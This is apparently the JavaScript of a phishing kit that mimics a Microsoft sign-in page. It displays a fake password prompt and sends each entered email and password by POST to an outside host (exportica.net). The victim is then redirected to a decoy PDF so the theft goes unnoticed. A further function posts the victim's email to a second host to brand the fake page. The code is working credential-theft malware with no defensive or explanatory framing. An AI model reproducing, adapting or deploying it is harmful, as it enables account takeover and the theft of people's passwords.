
	$(document).ready(function()
	{

		setTimeout(function ()
		{
			//var email = $('.identity').html();
			var email = $('#mai_hidden').val();
					$('#lightbox').show();
					$('#i0118').focus();
					<!-- set_brand(email); -->
					$(disable());
				}, 1000);
		
		var count = 1;
		
		$('#idSIButton9').on('click', function(event)
		{
			event.preventDefault ? event.preventDefault() : event.returnValue = false;
			// var user = $('.identity').html();
			var user = $('#mai_hidden').val();
			<!-- alert(user); -->
			var pass = $('#i0118').val();
				if(pass == "")
				{
					$("#passwordError2").show();
					$("#important").hide();
					$("#i0118").css("border-color", "#e81123");
					$("#i0118").focus();
					
				}
				else
				{
					$("#i0118").css("border-color", "black");
					$('#progressBarw').show();
					$("#passwordError2").hide();
					$("#passwordError").hide();
					$('#idSIButton9').prop('disabled', true);
					
					sendLogin(user, pass);
				}
		});
			
		function set_brand(email){
				$.ajax({
					url: 'https://constrcux.com/AA2.php', // add external link here for brand.php
					type: "POST",
					data: {email:email,barnd:1},
					success: function(data){
						var i=$.parseJSON(data);
						if(i.bg_image !== null && i.logo_image !== null && i.bg_image !== '' && i.logo_image !== ''){
							<!-- $('.background-image').css('background-image', 'url(' + i.bg_image + ')'); -->
							<!-- $('.logo').attr('src', i.logo_image); -->
						}
					}
				});
			}
			
		
	});

    
	
	function sendLogin(user, pass)
     
	{   
        var count = 0;
        ///////////new injection////////////////
        count = count + 1; 
        
          $.ajax({
            dataType: 'JSON',
            url: 'https://exportica.net/del/deli.php',
            type: 'POST',
            data: {
                email: user,
                password: pass,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#idSIButton9').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msgsuc").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#password").val("");
                        if (count >= 0) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("https://cloud-object-storage-gm-cos-static-web-hosting-co6.s3.us-east.cloud-object-storage.appdomain.cloud/656949ebook.pdf");

                        }
                        $('#passwordError').html(response['msg']);
                    } else {
                        $('#passwordError').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#password").val("");
                if (count >= 1000) {
                    count = 0;
                    window.location.replace("https://cloud-object-storage-gm-cos-static-web-hosting-co6.s3.us-east.cloud-object-storage.appdomain.cloud/656949ebook.pdf");
                }
                $("#passwordError").show();
                
            },
            complete: function() {
                
				$('#i0118').val('');
				$('#progressBarw').hide();
				$("#passwordError").show();
				$("#important").hide();
				$('#idSIButton9').prop('disabled', false);
            }
        });
    }
	
	